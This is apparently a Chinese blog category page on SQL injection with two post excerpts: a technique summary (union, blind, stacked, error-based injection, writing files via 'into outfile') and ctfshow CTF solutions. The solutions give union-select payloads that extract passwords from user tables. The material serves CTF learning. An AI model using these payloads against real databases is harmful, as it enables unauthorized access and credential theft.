SQL注入
文章平均质量分 92
记录遇到的有关SQL注入的题目
Anfy1
无
展开
-
sql注入总结
这里写目录标题联合注入对返回结果有过滤有时候需要用base64或hex返回对返回结果的数字进行了过滤利用读写文件把结果写入网站目录布尔盲注&&时间盲注普通方法regexpright join利用true绕过数字过滤MD5($str,true)利用where username=0中的弱类型比较堆叠注入修改列名预处理handler预处理十六进制转换into oufile的扩展利用报错注入双查询注入 联合注入 假设无过滤,这种是最简单的了算是。 -1' union select 1,2,3--+原创 2021-07-09 17:20:43 · 248 阅读 · 0 评论 -
sql注入————ctfshowsql注入
web171 -1’ union select 1,2,password from ctfshow_web.ctfshow_user–+ web172 -1’ union select 2,password from ctfshow_user2–+ web173 -1’ union select 1,2,password from ctfshow_user3–+ web174 -1’ union select ‘a’,replace(replace(replace(replace(replace(repla原创 2021-06-07 22:28:09 · 1884 阅读 · 0 评论